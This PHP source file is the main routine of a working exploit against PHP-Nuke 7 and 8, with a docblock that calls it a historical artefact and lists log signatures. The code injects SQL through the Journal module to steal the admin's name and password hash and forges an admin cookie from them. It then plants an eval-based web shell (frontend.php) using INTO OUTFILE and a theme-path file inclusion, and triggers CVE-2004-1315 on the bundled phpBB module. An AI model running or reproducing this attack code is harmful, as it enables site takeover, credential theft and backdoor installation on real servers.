/**
 * Entry point of a legacy PHP-Nuke 7/8 exploit proof-of-concept.
 *
 * Everything it depends on (magic_quotes_gpc, PHP-Nuke 8.1.x, the bundled
 * phpBB 2.0.6 module, CVE-2004-1315) is long end-of-life; the block is kept
 * as a historical artefact and documented here so that the requests it
 * makes can be recognised from the defending side.
 *
 * Flow, as the code below shows:
 *   1. Parse -t (target URL), -c (a logged-in user's cookie) and -a (an
 *      already-known admin cookie, debugging only) with getopt().
 *   2. Unless -a was given, obtain the first row of nuke_authors (aid, pwd):
 *      with -c through a Journal-module SQL injection whose result is read
 *      back from the created journal entry, otherwise through the
 *      php_nuke_blind_sql_injection helper ($sex). The admin cookie is then
 *      forged as "admin=" . base64("aid:md5hash:") — i.e. possession of an
 *      authors-table row is equivalent to an admin session.
 *   3. With the admin cookie, branch on the version heuristic (admin.php?op=general
 *      returning a body => "PHP-Nuke 8"): write frontend.php via
 *      `SELECT ... INTO OUTFILE` (Windows path) or via OUTFILE to /tmp plus a
 *      theme-path LFI (*nix path); on "PHP-Nuke 7" probe the phpBB highlight
 *      bug with a double-URL-encoded payload.
 *
 * Artefacts this script leaves on a target (useful for incident response):
 *   - a Journal entry titled "wow" (step 2, -c path);
 *   - frontend.php in the web root and, on *nix, /tmp/theme.php (the script
 *     tries to unlink it afterwards);
 *   - Default_Theme / display_errors changed in the _config table and the
 *     xdisplay_errors option toggled through op=savegeneral;
 *   - on PHP-Nuke 7, a category "test" and a forum/topic named "t".
 *
 * Log signatures visible in the request strings: POSTs to
 * modules.php?name=Journal&file=savenew and admin.php?op=modifyUser whose
 * body contains `union/**/`, `into outfile` or `select aid from nuke_authors`;
 * POST add_pwd[]=... to admin.php (path disclosure); GETs with a
 * highlight= value of the form %2527.xxx%2528...%2529.%2527; GETs to
 * frontend.php?e=.
 *
 * Side effects: prints progress to stdout, sleep()s between requests, and
 * die()s on usage errors or failed checks. No return value.
 *
 * @return void
 */
function main() {
    $user_input = getopt("t:c:a:");
    if ($user_input['t']) {
        $attack_url = $user_input['t'];
        if ($user_input['c']) {
            $user_cookie = $user_input['c'];
        }
        //-a is only useful for debugging, so it is not listed in the usage text.
        //Note: when -a (and -c) are absent the variables stay unset; the
        //`if (!$admin_cookie)` / `if ($user_cookie)` checks below rely on that.
        if ($user_input['a']) {
            $admin_cookie = $user_input['a'];
        }
    } else {
        print "Useage: ./php_exploit -t http://localhost\n";
        die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
    }
    //Normalise the target so module/admin paths can be appended to it.
    $attack_url = str_replace("index.php", "", $attack_url);
    $http = new http_client();
    $sex = new php_nuke_blind_sql_injection($attack_url . "/");
    if (!$admin_cookie) {
        //Step 2: recover the admin's aid and password hash.
        //This is what a decoded cookie looks like:
        //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
        //e.g. $user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
        if ($user_cookie) {
            print "Using cookie...\n";
            $http->cookie = $user_cookie;
            //1337+30000 (= 31337) is used as a pivot in parsing, and to test for a successful injection.
            //This is NOT blind SQL injection, the result is read back from the journal entry.
            //The original author states it works with magic_quotes_gpc on or off.
            $http->postdata = "title=wow\\&bodytext=/*&mood=" . urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
            $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
            //Original author's note: this part of the exploit is a bit strange, sorry for the mess.
            if (strstr($response, "javascript:history.go(-1)")) {
                //magic_quotes_gpc=on: the first insert was rejected, retry with a differently quoted payload.
                $http->postdata = "title=wow&jbodytext=text&mood=" . urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
                $http->postdata = '';
                //Find the primary key (jid) of the journal entry just created by scraping the edit list.
                $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                //We should have the single quote that was escaped at the end of wow'
                $jid = explode("\">wow<", $jid);
                $jid = explode("jid=", $jid[0]);
                //Check the journal for the admin's username/password hash
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
                //strpos() truthiness: a match at offset 0 would be treated as "not found" (offset 0 is falsy).
                if (strpos($response, "31337")) {
                    //The injected row renders as "31337 @ <aid>...31337 @ <pwd>"; split on the pivot.
                    list($junk, $aid, $pwd) = explode("31337 @ ", $response);
                    $aid = explode("<", $aid);
                    $pwd = explode("<", $pwd);
                    $user_name = $aid[0];
                    $pass_hash = $pwd[0];
                } else {
                    //magic_quotes_gpc=off: third payload variant, injecting through the status field.
                    sleep(3);
                    $http->postdata = "title=wow\\&jbodytext=/*&mood=1&status=" . urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1") . "&submit=Add+New+Entry";
                    $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
                    sleep(2);
                    $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                    $jid = explode("\">wow<", $jid);
                    $jid = explode("jid=", $jid[0]);
                    $jid = explode("\">", $jid[1]);
                    //Check the journal for the admin's username/password hash
                    $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[0]);
                    //Here the hash lands in the "Last updated on" field and the aid after " @ ".
                    $inj = explode("Last updated on ", $response);
                    $inj = explode(" @ ", $inj[1]);
                    $pass_hash = $inj[0];
                    $inj = explode("<", $inj[1]);
                    $user_name = $inj[0];
                }
            } else {
                //The first insert went through as-is.
                $http->postdata = '';
                //Find the primary key (jid) of the journal entry just created.
                $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                //We should have the single quote that was escaped at the end of wow'
                $jid = explode("\">wow',<", $jid);
                $jid = explode("jid=", $jid[0]);
                //Check the journal for the admin's username/password hash
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
                if (!strpos($response, "31337")) {
                    die("target has patched!\n");
                } else {
                    print "Target vulnerable to a privilege escalation attack!!!\n";
                    list($junk, $aid, $pwd) = explode("31337 @ ", $response);
                    $aid = explode("<", $aid);
                    $pwd = explode("<", $pwd);
                    $user_name = $aid[0];
                    $pass_hash = $pwd[0];
                }
            }
        } else {
            //No user cookie: fall back to the time-based blind injection helper.
            //Its request volume is reported via $sex->request_count below.
            $sex->sleep = "sleep(5)";
            print "Starting Attack Against:" . $attack_url . "/\n";
            print "Testing for blind sql injection...\n";
            if (!$sex->test_target()) {
                print "Target might be running 8.1.35\n";
                print "Try the privilege esciation attack to upload the shell:";
                die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
            }
            print "Target is vulnerable to blind sql injection!!!\n";
            print "Please Standby For Attack...\n";
            $pass_hash = $sex->find_md5("pwd");
            $user_name = $sex->find_string("aid");
            print "attacked used:" . $sex->request_count . " requests.\n";
        }
        print "Found Admin's name:" . $user_name . "\n";
        print "Found MD5 Password hash:" . $pass_hash . "\n";
        //PHP-Nuke's admin cookie is just base64("aid:md5hash:"): the hash alone is a
        //session credential, so a leaked nuke_authors row must be treated as a compromised admin account.
        $admin_cookie = "admin=" . base64_encode($user_name . ":" . $pass_hash . ":") . ";";
    }
    //Step 3: everything from here on is sent with the admin cookie.
    print "Using Admin Session ID:\n" . $admin_cookie . "\n";
    $http->cookie = $admin_cookie;
    //ipban.php — presumably a pause to stay under PHP-Nuke's request-flood check; not confirmed here.
    sleep(3);
    //This request tells us which version of php-nuke it is.
    //If it is 8, the page gives us configuration values to preserve and restore later.
    $admin_options = $http->send($attack_url . "/admin.php?op=general");
    if (!strstr($admin_options, "Content-Length: 0")) {
        print "PHP-Nuke 8 detected.\n";
        $option_values = explode("value='", $admin_options);
        $x = 0;
        array_shift($option_values);
        //Parse out and store the first five configuration values so they can be
        //re-submitted unchanged with op=savegeneral (only xdisplay_errors is altered).
        foreach ($option_values as $value) {
            $value = explode("'", $value);
            $values[] = urlencode($value[0]);
            if ($x++ == 4) {
                break;
            }
        }
        //ipban.php (throttle, see above)
        sleep(2);
        //Enable error reporting (xdisplay_errors=1) so the next request leaks the filesystem path.
        $http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
        $error_reporting = $http->send($attack_url . "/admin.php");
        //Path disclosure in add_pwd: passing the array add_pwd[] to md5() triggers a warning that prints the install path.
        //Defensively: display_errors=0 in production closes this disclosure.
        $http->postdata = "add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
        $remote_path = $http->getPath($attack_url . "/admin.php", 3);
        sleep(2);
        if (strstr($remote_path, ':\\')) {
            //Windows: a drive-letter path was disclosed; write the file directly into the web root.
            print "Windows box detected.\n";
            print "Remote path:{$remote_path}\n";
            print "Uploading backdoor...\n";
            //Double addslashes: once for the SQL string literal, once for the filter in between.
            $remote_path = addslashes(addslashes($remote_path . "\\frontend.php"));
            $backdoor = 'get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
            //Could have used a concat but php-nuke filters for it. charEncode hides <> from the XSS filter.
            //union/**/ bypasses the SQL injection filter on line 414 in ./mainfile.php
            //(the MySQL account needs FILE privilege for INTO OUTFILE — a detection/mitigation point).
            $http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '" . $remote_path . "'-- 1");
            $re = $http->send($attack_url . "/admin.php?op=modifyUser");
            //Disable error reporting again, restoring the saved option values.
            $http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
            $error_reporting = $http->send($attack_url . "/admin.php");
        } else {
            print "*nix box detected.\n";
            print "Remote path:{$remote_path}\n";
            //Is mysql on the same machine as the httpd? Probe with load_file() on the disclosed path.
            sleep(2);
            $http->postdata = "chng_uid=" . urlencode("' or 1=(select if(substring(load_file('" . $remote_path . "/index.php'),1,1)='<',0,1))-- 1");
            $mysql_check = $http->send($attack_url . "/admin.php?op=modifyUser");
            if (strstr($mysql_check, "User Doesn't Exists!")) {
                print "MySQL isn't on the same machine or you do not have file privileges.\n";
                die("Remote code execution failed\n");
            }
            print "Uploading backdoor...\n";
            //ipban.php (throttle, see above)
            sleep(2);
            //Grab the current theme name; it is needed to repair the database after the LFI.
            $theme = $http->send($attack_url . "/admin.php?op=themes");
            $theme = explode('src="themes/', $theme);
            $theme = explode('/images/', $theme[1]);
            //Repair the database after the LFI: the installer resets Default_Theme and display_errors in _config.
            $backdoor_installer = 'function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme=' . $sex->charEncode($theme[0]) . ', display_errors=0");';
            //This is a magic_quotes_gpc- and mysql-safe one-liner (quotes and $ are built with chr()).
            $backdoor = 'get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
            //Install the file in a directory relative to the document root.
            $backdoor_installer .= 'file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php ' . $backdoor . '?".chr(62));';
            //charEncode is used to bypass XSS filters.
            //union/**/ bypasses the SQL injection filter on line 414 in ./mainfile.php
            //Stage 1: write the installer to /tmp/theme.php (world-readable tmp + FILE privilege required).
            $http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor_installer . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
            $http->send($attack_url . "/admin.php?op=modifyUser");
            sleep(2);
            //Stage 2: local file include — point Default_Theme at ../../../../../../../../../../../tmp
            //so theme.php is included as the theme file. A traversal check on xDefault_Theme would stop this.
            $http->postdata = "xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
            $http->send($attack_url . "/admin.php");
            sleep(2);
            $http->postdata = '';
            //Fire off a GET request to trigger the uploaded php file via the LFI.
            $http->send($attack_url);
            sleep(2);
            //Try the LFI again, just in case.
            $http->send($attack_url . "/admin.php");
        }
        sleep(2);
        //Test whether frontend.php works and try to clean up /tmp/theme.php.
        $test_backdoor = $http->send($attack_url . "/frontend.php?e=" . urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
        if (strstr($test_backdoor, "31337")) {
            print "Remote Code execution tested successfully:\n" . $attack_url . "/frontend.php?e=phpinfo()" . urlencode(';') . "\n";
        } else {
            print "Backdoor install failed!\n";
        }
    } else {
        //PHP-Nuke 7.0 remote code execution using CVE-2004-1315, which affects the phpBB 2.0.6 module.
        print "PHP-Nuke 7 detected.\n";
        $http->postdata = "";
        //Send GET requests from here on.
        //Fire off a check for CVE-2004-1315; phpbb may be installed.
        //The original CVE-2004-1315 form was: %2527.printf(20041315).%2527
        //php-nuke was not vulnerable to that because of mainfile line 50: \([^>]*"?[^)]*\)
        //To bypass this check the parentheses are double-urlencoded: %2527.printf%252820041315%2529.%2527
        $try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
        //If the probe didn't work, phpbb may need enabling and populating with a topic first.
        if (!strstr($try_exploit, "20041315")) {
            //Enable PHPBB (module id 22)
            $http->send($attack_url . "/admin.php?op=module_status&mid=22&active=1");
            //Create a new category for phpbb
            $http->postdata = "mode=addcat&categoryname=test&addcategory=Create+new+category";
            $t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php");
            //ipban.php (throttle, see above)
            sleep(2);
            //Create a new forum in the new category
            $http->postdata = "forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
            $t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
            $http->postdata = "forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
            $http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
            //Create a new topic in the new forum
            $http->postdata = "username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
            $http->send($attack_url . "/modules.php?name=Forums&file=posting");
            //ipban.php (throttle, see above)
            sleep(2);
            //Access the first topic.
            $http->postdata = "";
            //Check whether any of the first 9 topics (t=1..9) is exploitable; $t is reused as the counter.
            for ($t = 1; $t < 10 && !strstr($try_exploit, "20041315"); $t++) {
                //Fire off a check for CVE-2004-1315.
                $try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . $t . "&highlight=%2527.printf%252820041315%2529.%2527");
            }
        }
        //Check if we were able to hit CVE-2004-1315.
        //Note: if the very first probe succeeded, $t was never assigned; --$t on null
        //leaves it null, so the printed URL then has an empty t= value.
        if (strstr($try_exploit, "20041315")) {
            print "Remote Code execution tested successfully:\n" . $attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . --$t . "&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n";
        } else {
            print "Remote code execution has failed!\n";
        }
    }
}